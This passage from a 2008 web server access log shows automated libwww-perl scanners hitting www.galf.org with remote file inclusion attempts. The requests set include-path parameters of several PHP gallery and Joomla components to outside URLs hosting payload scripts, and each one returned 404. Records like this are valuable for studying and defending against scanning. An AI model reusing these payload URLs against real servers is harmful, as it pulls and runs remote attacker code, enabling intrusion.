69.94.121.40 - - [20/Jan/2008:20:20:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.94.121.40 - - [20/Jan/2008:20:20:07 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.178.90 - - [20/Jan/2008:20:20:15 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.178.90 - - [20/Jan/2008:20:20:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.178.90 - - [20/Jan/2008:20:20:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:20:37 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:20:37 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:20:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:20:21:02 -0800] "GET /logs/access_070702.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.229.60.50 - - [20/Jan/2008:20:21:52 -0800] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.229.60.50 - - [20/Jan/2008:20:21:52 -0800] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
193.80.28.2 - - [20/Jan/2008:20:22:51 -0800] "GET /logs/access_070826.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://aers.t35.com/vennom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:20:22:56 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:24:06 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:24:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.90.135.132 - - [20/Jan/2008:20:24:12 -0800] "GET /logs/access_071022.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.crewfuck.kit.net/eval/safealba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.38.10.218 - - [20/Jan/2008:20:27:34 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.38.10.218 - - [20/Jan/2008:20:27:35 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.146.40.52 - - [20/Jan/2008:20:29:14 -0800] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.146.40.52 - - [20/Jan/2008:20:29:15 -0800] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:20:29:30 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.120.241.242 - - [20/Jan/2008:20:29:30 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.173.115 - - [20/Jan/2008:20:30:07 -0800] "GET /logs/access_071014.log/index.php?configFile=http://onlinemarketingcenter.com/ro